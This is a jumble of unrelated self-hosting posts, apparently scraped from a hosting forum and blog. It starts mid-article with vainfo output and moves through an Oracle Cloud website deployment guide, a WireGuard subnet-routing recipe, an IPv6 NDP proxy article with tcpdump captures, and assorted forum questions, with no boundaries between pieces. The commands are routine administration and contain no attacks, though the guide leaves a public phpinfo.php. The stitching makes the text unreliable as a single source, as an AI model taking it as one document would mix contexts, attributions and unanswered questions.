          VAProfileH264High               : VAEntrypointEncSliceLP
          VAProfileH264High               : VAEntrypointFEI
          VAProfileH264High               : VAEntrypointStats
          VAProfileH264MultiviewHigh      : VAEntrypointVLD
          VAProfileH264MultiviewHigh      : VAEntrypointEncSlice
          VAProfileH264StereoHigh         : VAEntrypointVLD
          VAProfileH264StereoHigh         : VAEntrypointEncSlice
          VAProfileVC1Simple              : VAEntrypointVLD
          VAProfileVC1Main                : VAEntrypointVLD
          VAProfileVC1Advanced            : VAEntrypointVLD
          VAProfileNone                   : VAEntrypointVideoProc
          VAProfileJPEGBaseline           : VAEntrypointVLD
          VAProfileJPEGBaseline           : VAEntrypointEncPicture
          VAProfileVP8Version0_3          : VAEntrypointVLD
          VAProfileVP8Version0_3          : VAEntrypointEncSlice
          VAProfileHEVCMain               : VAEntrypointVLD
          VAProfileHEVCMain               : VAEntrypointEncSlice
    

Conclusion

This article explores how to make use of Intel processor's integrated GPU in an unprivileged LXC 4.0 container, on Debian 11 bullseye host machine without Proxmox or LXD.
The key points include mounting the renderD128 device into the container, configuring idmap for the render group, and verifying the setup with vainfo command.
The result is an LXC container that can encode videos to H.264 and other formats in the GPU with Intel Quick Sync Video feature, which is 17.5% faster than CPU encoding.

Has anyone found a nice solution for this?

And yes, I know openvpn and a bunch of others already support 2FA. That is not an answer to the question.

Oracle Cloud is a cloud computing service offered by Oracle Corporation.
Oracle Cloud has a generous free tier that offers two "always free" Micro instances with the following specification:

• KVM virtualization
• 1/8 CPU cores (AMD EPYC 7551)
• 1GB memory
• 47GB disk storage
• 1 IPv4 address
• up to 32 IPv6 addresses
• 50Mbps Internet bandwidth

I signed up for Oracle Cloud, so that I can have some more free computing resources to play with.
The sign-up procedure requires a credit card for identity confirmation purpose, but the credit card will not be charged.
During sign-up, there's a choice of home region, which determines the location of VM instances; once selected, it cannot be changed in the future.

A common use case for a virtual machine is to host a website.
Due to the firewalls, hosting a website on Oracle Cloud needs a few more steps.
Here's exactly how to deploy a website in a Oracle Cloud Free Tier VM instance.

UPDATED 2022-01-27:
Oracle Cloud now supports IPv6.
Instructions are updated to enable IPv6 on the web server.

Create a VM Instance

Each Oracle Cloud account is eligible for two Always Free Micro instances.
To create a VM, sign in to the Oracle Cloud console, in "Launch Resources" section click Create a VM instance.
This takes us to the "Create Compute Instance" page.

In "Image and shape" section, select VM.Standard.E2.1.Micro shape and Canonical Ubuntu 20.04 image.
Do not use the "Canonical Ubuntu 20.04 Minimal" image.

In "Configure network" section, select Create new virtual cloud network, and keep other options at their default values.

In "Add SSH keys" section, select Paste public keys, and paste your SSH public key in the text box below.
If you do not have a SSH public key, follow this guide to generate one.

Finally, click the Create button to create the compute VM instance.
Within a few seconds, you should see the "Instance Details" page.

You can SSH into the VM instance using the public IP address and username displayed in the "Instance Access" section.

Enable IPv6

In this year, it is important for websites to support IPv6.
Today, most cellular networks are IPv6 only.
By enabling IPv6, it enables mobile users to access your website more efficiently, because their sessions do not need to go through IPv4 address translation proxies.

Oracle Cloud compute VM instances are initially assigned with only an IPv4 address.
There are 5 steps for enabling IPv6 on the VM:

1. Assign IPv6 CIDR block to the Virtual Cloud Network.
2. Assign IPv6 CIDR block to the Subnet.
3. Configure IPv6 Route Rule.
4. Assign IPv6 Address to the compute VM's VNIC.
5. Configure firewall rules.

We will perform steps 1~4 now, and do step 5 a little later (in "Configure Ingress and Egress Rules" section).

Looking at the "Instance Details" page, click the link next to "Virtual cloud network".
This takes us to the "Virtual Cloud Network Details" page.

Select "CIDR Blocks" tab on the left side "Resources" menu, and then click Add IPv6 CIDR Block button.
You will be asked to confirm that you want to enable IPv6.
When you click Confirm, a /56 block of 4,722,366,482,869,645,213,696 IPv6 addresses are automatically allocated to your Virtual Cloud Network (IPv6 step 1).

Select "Subnets" tab on the left side "Resources" menu.
You should see an existing Subnet.
It would have an IPv4 CIDR Block, but the "IPv6 CIDR Block" column is blank.
Click the ⋮ button in the rightmost column, and select "Edit" in the dropdown menu.
Then, check Enable IPv6 CIDR Block box, enter two hexadecimal digits (such as 00) in the box just before "::/64", and click Save Changes (IPv6 step 2).

Select "Route Tables" tab on the left side "Resources" menu, and then click Default Route Table link.
This takes us to the "Route Table Details" pages.
In the "Route Rules" tables, we can see that there's a route rule for destination 0.0.0.0/0 that targets the Internet gateway, which allows IPv4 packets to reach the Internet.
We need a similar route rule for IPv6.
Click Add Route Rules button.
In the popup dialog, enter the following:

• Protocol Version: IPv6
• Target Type: Internet Gateway
• Destination CIDR Block: ::/0
• Target Internet Gateway: Internet gateway vcn-…

Then click Add Route Rules button (IPv6 step 3).

Finally, go back to the "Instance Details" page of the compute VM instance.
To find that page, you can type "Instances" into the search bar and select "Services - Instances (Compute)" in the results.

Select "Attached VNICs" tab on the left side "Resources" menu, and then click the link next to (Primary VNIC).
This opens the "VNIC Details".
Select "IPv6 Addresses" tab on the left side "Resources" menu, and click Assign IPv6 Address button.
In the popup dialog, click Assign button to get a random IPv6 address (IPv6 step 4).

DNS

Now that we have the IP addresses assigned, it is a good time to add DNS records to our compute VM instance, so that we can activate HTTPS later.
Two DNS records are required: an A record for the public IPv4 address and an AAAA record for the public IPv6 address.
You can find both addresses in the "VNIC Details" page, as described above.

Configure Ingress and Egress Rules

Oracle Cloud has a strict firewall that, by default, only allows SSH access.
In order to host a website, it is necessary to configure the firewall so that it allows HTTP traffic.

To access the firewall configuration page, click the "subnet" name in "Primary VNIC" section of "Instance Details" page.
Then, on "Subnet Details" page, click "Default Security List for …" in "Security Lists" section.
Click Add Ingress Rules button, and enter these four rules in the popup dialog:

• Allow HTTP/1.1 and HTTP/2 (IPv4)

  • stateless: no
  • source CIDR: 0.0.0.0/0
  • IP protocol: TCP
  • destination port range: 80,443

• Allow HTTP/1.1 and HTTP/2 (IPv6)

  • stateless: no
  • source CIDR: ::/0
  • IP protocol: TCP
  • destination port range: 80,443

• Allow HTTP/3 (IPv4)

  • stateless: no
  • source CIDR: 0.0.0.0/0
  • IP protocol: UDP
  • destination port range: 443

• Allow HTTP/3 (IPv6)

  • stateless: no
  • source CIDR: ::/0
  • IP protocol: UDP
  • destination port range: 443

After that, you should see the following ingress rules in the table:

You should also add an IPv6 egress rule, so that the VM instance can reach Internet resources over IPv6.
To do that, select "Egress Rules" tab on the left side "Resources" menu.
Click Add Egress Rules button, and enter the following rule in the popup dialog (IPv6 step 5):

• Allow IPv6 Internet access
  • stateless: no
  • destination CIDR: ::/0
  • IP protocol: All Protocols

Install HTTP Server

With the firewall rules in place, we are ready to install an HTTP server.
In this guide, I'm installing Caddy HTTP server along with PHP-FPM.
They can be installed from Caddy package repository and ondrej/php PPA respectively.

# see "Caddy package repository" link above for how to add Caddy APT repository
sudo add-apt-repository ppa:ondrej/php
sudo apt install caddy php8.1-fpm

Before we can start the HTTP server, there's one more firewall to configure: the local iptables.
Oracle Cloud not only has an external firewall at subnet level, but also blocks traffic in iptables INPUT chain.
We can setup a systemd service to insert iptables rules before Caddy starts:

sudoedit /etc/systemd/system/caddy-iptables.service
  (paste the caddy-iptables.service content)

sudo systemctl daemon-reload
sudo systemctl enable --now caddy-iptables

The systemd unit file caddy-iptables.service should have the following content:

[Unit]
Description=Firewall rules for Caddy
Before=caddy.service

[Service]
ExecStartPre=+/usr/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
ExecStartPre=+/usr/sbin/iptables -I INPUT -p tcp --dport 443 -j ACCEPT
ExecStartPre=+/usr/sbin/iptables -I INPUT -p udp --dport 443 -j ACCEPT
ExecStartPre=+/usr/sbin/ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
ExecStartPre=+/usr/sbin/ip6tables -I INPUT -p tcp --dport 443 -j ACCEPT
ExecStartPre=+/usr/sbin/ip6tables -I INPUT -p udp --dport 443 -j ACCEPT
ExecStart=true
RemainAfterExit=yes
ExecStopPost=+/usr/sbin/iptables -D INPUT -p tcp --dport 80 -j ACCEPT
ExecStopPost=+/usr/sbin/iptables -D INPUT -p tcp --dport 443 -j ACCEPT
ExecStopPost=+/usr/sbin/iptables -D INPUT -p udp --dport 443 -j ACCEPT
ExecStopPost=+/usr/sbin/ip6tables -D INPUT -p tcp --dport 80 -j ACCEPT
ExecStopPost=+/usr/sbin/ip6tables -D INPUT -p tcp --dport 443 -j ACCEPT
ExecStopPost=+/usr/sbin/ip6tables -D INPUT -p udp --dport 443 -j ACCEPT

[Install]
RequiredBy=caddy.service

Upload your website content, and make sure the www-data group can access them.
In this example, I'll create two simple files:

sudo mkdir -p /var/www/html
echo '<h1>hello</h1>' | sudo tee /var/www/html/index.html
echo '<?php phpinfo(); ?>' | sudo tee /var/www/html/phpinfo.php
sudo chgrp -R www-data /var/www/html

Edit the Caddyfile (/etc/caddy/Caddyfile), paste the following:
(change the domain name and root directory as appropriate)

{
  servers {
    protocol {
      experimental_http3
    }
  }
}

https://demo.example.com {
  root * /var/www/html
  file_server
  php_fastcgi unix//run/php/php8.1-fpm.sock

  header {
    Strict-Transport-Security max-age=2592000
    X-Frame-Options SAMEORIGIN
    X-Content-Type-Options nosniff
    Referrer-Policy no-referrer-when-downgrade
  }
}

Finally, restart the webserver for the settings to take effect:

sudo systemctl restart caddy
sudo systemctl restart php8.1-fpm

Test the Website

To confirm everything is working, we can visit the index page https://demo.example.com/ and the PHP script https://demo.example.com/phpinfo.php in the browser.

Then, we use the curl command line tool (on a different machine) to check that:

• HTTP-to-HTTPS redirect is working properly.
• The website is served over HTTP/1.0, HTTP/1.1, HTTP/2, and HTTP/3.
• The server is accessible over both IPv4 and IPv6.

$ curl -4 --http1.0 -I http://demo.example.com/
HTTP/1.0 308 Permanent Redirect
Connection: close
Location: https://demo.example.com/
Server: Caddy
Date: Fri, 28 Jan 2022 02:16:43 GMT

$ curl -6 --http1.0 -I http://demo.example.com/
HTTP/1.0 308 Permanent Redirect
Connection: close
Location: https://demo.example.com/
Server: Caddy
Date: Fri, 28 Jan 2022 02:16:43 GMT

$ curl -4 --http1.1 -I http://demo.example.com/
HTTP/1.1 308 Permanent Redirect
Connection: close
Location: https://demo.example.com/
Server: Caddy
Date: Fri, 28 Jan 2022 02:16:44 GMT

$ curl -6 --http1.1 -I http://demo.example.com/
HTTP/1.1 308 Permanent Redirect
Connection: close
Location: https://demo.example.com/
Server: Caddy
Date: Fri, 28 Jan 2022 02:16:44 GMT

$ curl -4 --http1.1 -I https://demo.example.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Length: 15
Content-Type: text/html; charset=utf-8
Etag: "r6edtff"
Last-Modified: Fri, 28 Jan 2022 02:05:39 GMT
Referrer-Policy: no-referrer-when-downgrade
Server: Caddy
Strict-Transport-Security: max-age=2592000
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Date: Fri, 28 Jan 2022 02:16:45 GMT

$ curl -6 --http1.1 -I https://demo.example.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Length: 15
Content-Type: text/html; charset=utf-8
Etag: "r6edtff"
Last-Modified: Fri, 28 Jan 2022 02:05:39 GMT
Referrer-Policy: no-referrer-when-downgrade
Server: Caddy
Strict-Transport-Security: max-age=2592000
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Date: Fri, 28 Jan 2022 02:16:45 GMT

$ curl -4 --http2 -I https://demo.example.com/
HTTP/2 200
accept-ranges: bytes
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-type: text/html; charset=utf-8
etag: "r6edtff"
last-modified: Fri, 28 Jan 2022 02:05:39 GMT
referrer-policy: no-referrer-when-downgrade
server: Caddy
strict-transport-security: max-age=2592000
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-length: 15
date: Fri, 28 Jan 2022 02:16:46 GMT

$ curl -6 --http2 -I https://demo.example.com/
HTTP/2 200
accept-ranges: bytes
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-type: text/html; charset=utf-8
etag: "r6edtff"
last-modified: Fri, 28 Jan 2022 02:05:39 GMT
referrer-policy: no-referrer-when-downgrade
server: Caddy
strict-transport-security: max-age=2592000
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-length: 15
date: Fri, 28 Jan 2022 02:16:46 GMT

$ docker run -t --rm --network host ymuski/curl-http3 curl -4 --http3 -I https://demo.example.com/
HTTP/3 200
server: Caddy
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
x-content-type-options: nosniff
last-modified: Fri, 28 Jan 2022 02:05:39 GMT
content-type: text/html; charset=utf-8
accept-ranges: bytes
content-length: 15
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=2592000
x-frame-options: SAMEORIGIN
etag: "r6edtff"

$ docker run -t --rm --network host ymuski/curl-http3 curl -6 --http3 -I https://demo.example.com/
HTTP/3 200
x-frame-options: SAMEORIGIN
etag: "r6edtff"
accept-ranges: bytes
content-length: 15
server: Caddy
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=2592000
x-content-type-options: nosniff
content-type: text/html; charset=utf-8
last-modified: Fri, 28 Jan 2022 02:05:39 GMT

Finally, we use SSL Server Test to verify that TLS certificates and crypto are configured securely, and use Security Headers to check that HTTP Strict Transport Security is setup correctly.

Conclusion

This article explains how to deploy a website in a VM instance on Oracle Cloud Free Tier.
It involves the following steps:

1. Create an always free compute VM instance.
2. Enable IPv6 in the Virtual Cloud Network, subnet, and VM instance.
3. Add ingress and egress rules in the network Security List.
4. Install Caddy HTTP server and PHP.
5. Configure local iptables firewall.
6. Test the website installation.

Before, when uploading and downloading stuff from Hetzner Storage Box, the speed was limited by my connection speed.

I'm uzing FileZilla Pro for downloads. Uploads are usually done by the hosting servers when they run off-site backups. But I wanted to test how fast it goes to and from my computer. Trying to download compressed backups, and upload some. I tested download and upload "separately" - i.e. first downloading, then uploading. Using a normal FTP connection.

It seems that upload speed is limited by my connection speed (about 64 Mb/s). But the download speed was stuck at about 32 Mb/s - far below any other bottlenecks I have (my local storage, connection etc.).

Is this normal, or could the problem be on my end (and/or between my keyboard and the computer )?

This is my long-winded drivel on how I set up and use the storage (passwords and usernames shown aren't real, just examples):
https://io.bikegremlin.com/20986/hetzner-storage-box-explained/

I would like to share our experience regarding Secondary DNS for Plesk server. For the moment It has been pretty straight forward to setup Slave nameservers for Plesk.

The issue is, the solution becomes totally unreliable once you have 2 master servers or more. It looks like Plesk themselves couldn't figure out issues related to rndc-keys etc for our case. We have been getting random disconnections etc...

Additionally it requires the maintenance of the nameservers slave and having them on different locations or datacenters

We found solutions such as gDNS from Admin Ahead but it looks too complicated and not that different from the Plesk Slave servers.

We want to share our solution for the community especially the ones using Plesk, we are also planning to test the solution on different Hosting panels such as cPanel.

You can go ahead and create an account at https://www.cloudns.net/

Once done, you will need to put edit a default provided PHP script that you can find on their Github Page.

Due to the multiple changes between the old script and the new one we have provided some additional information to the ClouDNS team who corrected some elements on their previous one.

You can read the article they have put together for Plesk servers. https://www.cloudns.net/wiki/article/250

We will try to do the same for cPanel very soon and update this thread.

through this you can enjoy IPV4 & IPV6 Anycast Secondary DNS and protect your Master server

Regarding the Cronjob to setup we made it run once per minute in our case due to multiple DNS zone changes and new clients. Especially that Plesk is kind of slow when it comes to SSL

We would love to hear your feedback

It doesn't matter whether the software creates a new login session, or "logs in" to the existing session.

I'm using Windscribe VPN with an option of a static IP address and port forwarding (not sure if that's helpful, or a problem if both computers use the same static IP ).

The less command prompt work/learning, the better, but it's not a problem that I'm not willing to overcome if there aren't any GUI alternatives.

Oh, the use case:

I want to be able to use a remote computer for the time-consuming video editing (rendering is the right term?), see when it's over, let it run the next one, while I'm doing some other work far away, on my other computer.
And no, because of some minute fiddling needed, any batch processing is not an option (for now).

@Mason Current YABS only shows total disk space, could you consider add disk details option and indicate which disk device (and filesystem) it's bench marking?

• Debian 11.1 "Bullseye" and a default Linux kernel 5.13
• LXC 4.0, Ceph 16.2.6, QEMU 6.1, and OpenZFS 2.1
• Updated VM wizard with defaults for Windows 11 (q35, OVMF, TPM)
• Latest virtio drivers
• New backup scheduler daemon for flexible scheduling options
• Backup retention
• Protected backups
• Improved TFA: WebAuthn, recovery keys, multiple factors for single account
• New container templates: Fedora, Ubuntu, Alma Linux, Rocky Linux

View the detailed release notes including links to the upgrade guides: https://pve.proxmox.com/wiki/Roadmap

Anybody here have any neat automated setups to share?

Tempted to set something up on a VPS that regularly hits my home static IP...assuming I can get that VPS ToS approved lol.

Topology - pfSense running on proxmox at a remote site behind ISP router and with a dynamic IP (so double NAT). Proxmox box also runs a container with piHole and a small debian VM.

I need to remotely administer the whole thing. Initially I set up DuckDNS to get the remote IP and an openVPN server on pfSense, but thought there might be an easier solution. There is.

I have a mrVM VPS (thanks @mikho) running Wireguard as installed using @Nyr 's installer https://talk.lowendspirit.com/discussion/974/wireguard-automated-installer-ubuntu-debian-centos-fedora Thanks @Nyr .

The remote subnet is 192.168.1.0/24, my local is 192.168.0.0/24 .

Installed Wireguard on the debian VM running on the remote subnet, and created a .conf file for it on the VPS using @Nyr 's tool. Edited the entry in /etc/wireguard/wg0.conf on the VPS for the new client and changed:

AllowedIPs = 10.7.0.X/32, ipv6 address

to

AllowedIPs = 10.7.0.X/32, 192.168.1.0/24

That does the magic routing of 192.168.1.0/24 over Wireguard to that remote client. I probably could have left the ipv6 entry there as well.

On the remote debian client:

iptables -A FORWARD -i wg0-client -j ACCEPT
iptables -t nat -A POSTROUTING -o ensX -j MASQUERADE

Where wg0-client is the name of the .conf file on the remote debian VM and ensX is its virtual NIC.

Made iptables persistent and started the Wireguard connection as a service:

systemctl start wg-quick@wg0-client
systemctl enable wg-quick@wg0-client

Edit: Oops, and also edit /etc/sysctl.conf on the remote debian VM and add or change:

net.ipv4.ip_forward = 1

then reboot or just do:

sysctl -p

Works like magic - I have full access to the remote 192.168.1.0/24 subnet from my local machine (once that machine is also connected as a Wireguard client of the VPS), without doing anything further.

My website has been down for hours, and they don't seem to be fixing it (sent a few tickets already).

The domain is:
facebook.com

May the admins please remove this post if it isn't funny. Couldn't resist.

I Want IPv6 for Docker

I'm playing with Docker these days, and I want IPv6 in my Docker containers.
The best guide for enabling IPv6 in Docker is how to enable IPv6 for Docker containers on Ubuntu 18.04.
The first method in that article assigns private IPv6 addresses to containers, and uses IPv6 NAT similar to how Docker handles IPv4 NAT.
I quickly got it working, but I noticed an undesirable behavior: Network Address Translation (NAT) changes the source port number of outgoing UDP datagrams, even if there's a port forwarding rule for inbound traffic; consequently, a UDP flow with the same source and destination ports is being recognized as two separate flows.

$ docker exec nfd nfdc face show 262
    faceid=262
    remote=udp6://[2001:db8:f440:2:eb26:f0a9:4dc3:1]:6363
     local=udp6://[fd00:2001:db8:4d55:0:242:ac11:4]:6363
congestion={base-marking-interval=100ms default-threshold=65536B}
       mtu=1337
  counters={in={25i 4603d 2n 1179907B} out={11921i 14d 0n 1506905B}}
     flags={non-local permanent point-to-point congestion-marking}
$ docker exec nfd nfdc face show 270
    faceid=270
    remote=udp6://[2001:db8:f440:2:eb26:f0a9:4dc3:1]:1024
     local=udp6://[fd00:2001:db8:4d55:0:242:ac11:4]:6363
   expires=0s
congestion={base-marking-interval=100ms default-threshold=65536B}
       mtu=1337
  counters={in={11880i 0d 0n 1498032B} out={0i 4594d 0n 1175786B}}
     flags={non-local on-demand point-to-point congestion-marking}

The second method in that article allows every container to have a public IPv6 address.
It avoids NAT and the problems that come with it, but requires the host to have a routed IPv6 subnet.
However, routed IPv6 is hard to come by on KVM servers, because virtualization platform such as Virtualizor does not support routed IPv6 subnets, but can only provide on-link IPv6.

On-Link IPv6 vs Routed IPv6

So what's the difference between on-link IPv6 and routed IPv6, anyway?
It differs in how the router at the previous hop is configured to reach a destination IP address.

Let me explain in IPv4 terms first:

|--------| 192.0.2.1/24       |--------| 198.51.100.1/24    |-----------|
| router |--------------------| server |--------------------| container |
|--------|       192.0.2.2/24 |--------|    198.51.100.2/24 |-----------|
            (192.0.2.16-23/24)    |
                                  | 192.0.2.17/28           |-----------|
                                  \-------------------------| container |
                                              192.0.2.18/28 |-----------|

• The server has on-link IP address 192.0.2.2.

  • The router knows this IP address is on-link because it is in the 192.0.2.0/24 subnet that is configured on the router interface.
  • To deliver a packet to 192.0.2.2, the router sends an ARP query of 192.0.2.2 to learn the server's MAC address, which should be responded by the server.

• The server has routed IP subnet 198.51.100.0/24.

  • The router must be configured to know: 198.51.100.0/24 is reachable via 192.0.2.2.
  • To deliver a packet to 198.51.100.2, the router first queries its routing table and finds the above entry, then sends an ARP query to learn the MAC address of 192.0.2.2 which should be responded by the server, and finally delivers the packet to the learned MAC address.

• The main difference is what IP address is enclosed in the ARP query:

  • If the destination IP address is an on-link IP address, the ARP query contains the destination IP address itself.
  • If the destination IP address is in a routed subnet, the ARP query contains the nexthop IP address, as determined by the routing table.

• If I want to assign an on-link IPv4 address (e.g. 192.0.2.18/28) to a container, the server should be made to answer ARP queries for that IP address so that the router would deliver packets to the server, and then forwards these packets to the container.

  • This technique is called ARP proxy, in which the server responds to ARP queries on behalf of the container.

The situation is a bit more complex in IPv6 because each network interface can have multiple IPv6 addresses, but the same concept applies.
Instead of Address Resolution Protocol (ARP), IPv6 uses Neighbor Discovery Protocol that is part of ICMPv6.
A few terminology differs:

If I want to assign an on-link IPv6 address to a container, the server should respond to neighbor solicitations for that IP address, so that the router would deliver packets to the server.
After that, the server's Linux kernel could route the packet to the container's bridge, as if the destination IPv6 address was in a routed subnet.

NDP Proxy Daemon to the Rescue, I Hope?

ndppd, or NDP Proxy Daemon, is a program that listens for neighbor solicitations on a network interface and responds with neighbor advertisements.
It is often recommended for dealing with the scenario when the server has only on-link IPv6 but we need a routed IPv6 subnet.

I installed ndppd on one of my servers, and it worked as expected with this configuration:

proxy uplink {
  rule 2001:db8:fbc0:2:646f:636b:6572::/112 {
    auto
  }
}

I can start up a Docker container with a public IPv6 address.
It can reach the IPv6 Internet, and can be ping-ed from outside.

$ docker network create --ipv6 --subnet=172.26.0.0/16
  --subnet=2001:db8:fbc0:2:646f:636b:6572::/112 ipv6exposed
118c3a9e00595262e41b8cb839a55d1bc7bc54979a1ff76b5993273d82eea1f4

$ docker run -it --rm --network ipv6exposed
  --ip6 2001:db8:fbc0:2:646f:636b:6572:d002 alpine

# wget -q -O- https://www.cloudflare.com/cdn-cgi/trace | grep ip
ip=2001:db8:fbc0:2:646f:636b:6572:d002

However, when I repeated the same setup on another KVM server, things didn't go well: the container cannot reach the IPv6 Internet at all.

$ docker run -it --rm --network ipv6exposed
  --ip6 2001:db8:f440:2:646f:636b:6572:d003 alpine

/ # ping -c 4 ipv6.google.com
PING ipv6.google.com (2607:f8b0:400a:809::200e): 56 data bytes

--- ipv6.google.com ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss

What's Wrong with ndppd?

Why ndppd works on the first server, but does not work on the second server?
What's the difference?
We need to go deeper, so I turned to tcpdump.

On the first server, I see:

$ sudo tcpdump -pi uplink icmp6
19:13:17.958191 IP6 2001:db8:fbc0::1 > ff02::1:ff72:d002:
    ICMP6, neighbor solicitation, who has 2001:db8:fbc0:2:646f:636b:6572:d002, length 32
19:13:17.958472 IP6 2001:db8:fbc0:2::2 > 2001:db8:fbc0::1:
    ICMP6, neighbor advertisement, tgt is 2001:db8:fbc0:2:646f:636b:6572:d002, length 32

• The neighbor solicitation from the router comes from a global IPv6 address.

• The server responds with a neighbor advertisement from its global IPv6 address.
  Note that this address differs from the container's address.

• IPv6 works in the container.

On the second server, I see:

$ sudo tcpdump -pi uplink icmp6
00:07:53.617438 IP6 fe80::669d:99ff:feb1:55b8 > ff02::1:ff72:d003:
    ICMP6, neighbor solicitation, who has 2001:db8:f440:2:646f:636b:6572:d003, length 32
00:07:53.617714 IP6 fe80::216:3eff:fedd:7c83 > fe80::669d:99ff:feb1:55b8:
    ICMP6, neighbor advertisement, tgt is 2001:db8:f440:2:646f:636b:6572:d003, length 32

• The neighbor solicitation from the router comes from a link-local IPv6 address.
• The server responds with a neighbor advertisement from its link-local IPv6 address.
• IPv6 does not work in the container.

Since IPv6 has been working on the second server for IPv6 addresses assigned to the server itself, I added a new IPv6 address and captured its NDP exchange:

$ sudo tcpdump -pi uplink icmp6
00:29:39.378544 IP6 fe80::669d:99ff:feb1:55b8 > ff02::1:ff00:a006:
    ICMP6, neighbor solicitation, who has 2001:db8:f440:2::a006, length 32
00:29:39.378581 IP6 2001:db8:f440:2::a006 > fe80::669d:99ff:feb1:55b8:
    ICMP6, neighbor advertisement, tgt is 2001:db8:f440:2::a006, length 32

• The neighbor solicitation from the router comes from a link-local IPv6 address, same as above.
• The server responds with a neighbor advertisement from the target global IPv6 address.
• IPv6 works on the server from this address.

In IPv6, each network interface can have multiple IPv6 addresses.
When the Linux kernel responds to a neighbor solicitation in which the target address is assigned to the same network interface, it uses that particular address as the source address.
On the other hand, ndppd transmits neighbor advertisements via a PF_INET6 socket and does not specify the source address.
In this case, some complicated rules for default address selection come into play.

One of these rules is preferring a source address that has the same scope as the destination address (i.e. the router).
On my first server, the router uses a global address, and the server selects a global address as the source address on its neighbor advertisement.
On my second server, the router uses a link-local address, and the server selects a link-local address, too.

In an unfiltered network, the router wouldn't care where the neighbor advertisements come from.
However, when it comes to a KVM server on Virtualizor, the hypervisor would treat such packets as attempted IP spoofing attacks, and drop them via ebtables rules.
Consequently, the neighbor advertisement never reaches the router, and the router has no way to know how to reach the container's IPv6 address.

ndpresponder: NDP Responder for KVM VPS

I tried a few tricks such as deprecating the link-local address, but none of them worked.
Thus, I made my own NDP responder that sends neighbor advertisements from the target address.

ndpresponder is a Go program using the GoPacket library.

1. The program opens an AF_PACKET socket, with a BPF filter for ICMPv6 neighbor solicitation messages.
2. When a neighbor solicitation arrives, it checks the target address against a user-supplied IP range.
3. If the target address is in the range used for Docker containers, the program constructs an ICMPv6 neighbor advertisement messages and transmits it through the same AF_PACKET socket.

A major difference from ndppd is that, the source IPv6 address on a neighbor advertisement message is always set to the same value as the target address of the neighbor solicitation, so that the message wouldn't be dropped by the hypervisor.
This is made possible because I'm sending the message via an AF_PACKET socket, instead of the AF_INET6 socket used by ndppd.

ndpresponder operates similarly as ndppd in "static" mode.
It does not forward neighbor advertisements to the destination subnet like ndppd does in its "auto" mode, but this feature isn't important on a KVM server.

If ndppd doesn't seem to work on your KVM VPS, give ndpresponder a try!
Head to my GitHub repository for installation and usage instructions:
https://github.com/yoursunny/ndpresponder

PHP Notice: Undefined offset: 1 in /home/myuser/whmbackupsolutions/whmbackup.php on line 49

And:

PHP Notice: Trying to access array offset on value of type null in /home/myuser/whmbackupsolutions/whmbackup.php on line 202

The line 49 says this:

list($arg_x, $arg_y) = explode('=', $arg);

Line 202 says:

if ($save_status["error"] == "1")

The entire code (copy/pasted):
https://wtools.io/paste-code/b6S5

I understand that PHP is getting less and less "liberal" and that the warning might turn into an error only with newer version updates.
The script itself works fine for now.
But if anyone has an easy fix for the problem, I'd appreciate it (I'm not a programmer).

@johnk said:

@bikegremlin said:

@johnk said:

@bikegremlin said:

@asaljeplak said:

>

Keep an eye on the total resource usage (in LVM).

Enterprise Entry Reseller for example lets you host a few larger websites that might otherwise have required a separate, “Enterprise Shared” account.

That flexibility is a plus.

The downside is having to keep an eye on the clients’ resource usage.

So far, I am pleasantly how little resources all my sites take. Seems like I could easily add at least 10 more to the same reseller account.

It’s all a shared hosting environment. I discussed the CloudLinux vCPU here:

https://io.bikegremlin.com/23107/what-is-vcpu/

I love the analogies for the components - that is really awesome!

One suggestion:

Let’s take the above-mentioned 4-core (4 workers) CPU with 2 threads per core for an example:
4 cores with 2 threads each = 8 threads.
8 threads time 4 cores (again!) = 32 vCPU

A vCPU is pretty much universally accepted as a (1) logical processor. You can pin/provision 4 (or 8, or 12, or whatever) users to a vCPU, the actual amount of vCPUs don't change (so you can't really "make" another vCPU). LVE/CGroups work by limiting the number of cycles you can run on a vCPU/CPU versus creating virtual "processors" for each user to run tasks on.

That was just the part that stuck out to me as confusing.

Thanks.

For a(n absolute) beginner, which explanation do you think is less confusing to get the hang of the basic concept?

My idea is to use "iteration." At the cost of the first explanation being less correct/accurate, in order to relay the basic meaning/idea.

IMHO, since you gloss over the idea if "threads" anyways ("hands") it makes sense to just use that and talk about provisioning users to threads. (eg, "# of jobs assigned to a worker")

Thanks. I'll think it over. Though I fear that going any more technical might be a step back for the article in question.
If I use the word "processor cycle" - that will probably take a separate article, or at least an extra "chapter" to explain. But that would be the technically most accurate explanation for the LVE.

In other words, at least in my opinion, to be more technically correct would take a separate article on CPU-s (that relates to an article about motherboards, and buses), and an article on virtualization and hypervisors (since I mention VPSs - because that's what gets around a lot "get a VPS, it's more powerful!").

I'm sure that over the years I'll write those articles as well - then link to them for anyone interested in more details. And I'll see about correcting the existing article even before that - with your remarks in mind, but with a lot of thought and caution (leaning towards "less is more" for this article - it's already on the too-long side for its "target audience" as the marketers say ).

Just reaching out to ask if anyone knew of any fancy automated tool that could be installed on multiple VPSes to test the bandwidth between them on a regular basis? I've got a Los Angeles Hosthatch service that seems to have less-than-expected network performance and I wanted to collect to more data see if it varies over time. Smokeping's showing cyclical latency variation but actual throughput stats would be great.

I was thinking of rolling something myself using iperf and cron, however thought I'd ask to see if there's something out there that I may have missed during my research...

thanks in advance!

did anyone try SS on the 512MB server, and your recommend to improve stability? Cuz if I can launch 100 websites on low memory it will be like $2.50 only each which is amazing (not for Woocommerce)

kinda surprised nobody is talking about WordPress stack scripts here I see only one 2019 topic

